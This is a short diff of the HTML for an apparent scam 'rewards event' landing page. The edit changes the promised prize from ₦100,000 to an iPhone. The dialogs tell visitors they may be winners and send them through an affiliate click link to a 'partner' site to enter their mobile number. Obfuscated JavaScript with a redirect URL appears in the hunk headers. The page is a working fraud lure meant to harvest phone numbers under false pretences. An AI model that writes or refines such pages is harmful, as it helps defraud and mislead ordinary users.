--- a/pinbox/e20235231703ncash/prelp.html
+++ b/pinbox/e20235231703ncash/prelp.html
@@ -154,7 +154,7 @@ var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.c
 	<script>
 		Swal.fire({
 			title: 'Rewards event',
-			html: "Congratulations, dear customer!<br><br>To thank you for your loyalty to us, we are giving you the chance to win an <strong>₦100,000</strong><br><br>Open boxes to participate and win prizes!<br><br><strong>Good Luck!</strong>",
+			html: "Congratulations, dear customer!<br><br>To thank you for your loyalty to us, we are giving you the chance to win an <strong>iphone</strong><br><br>Open boxes to participate and win prizes!<br><br><strong>Good Luck!</strong>",
 			confirmButtonText: 'OK',
 			confirmButtonColor: '#ff0000',
 		});
@@ -177,7 +177,7 @@ var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.c
 		function dialog3() {
 			Swal.fire({
 				imageUrl: 'img/box_iphone',
-				html: '<strong>You may be a Winner of:</strong> <h2>Lottery voucher</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
+				html: '<strong>You may be a Winner of:</strong> <h2>iphone</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
 				footer: '<a href="https://blast.radadpro.com/click/" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
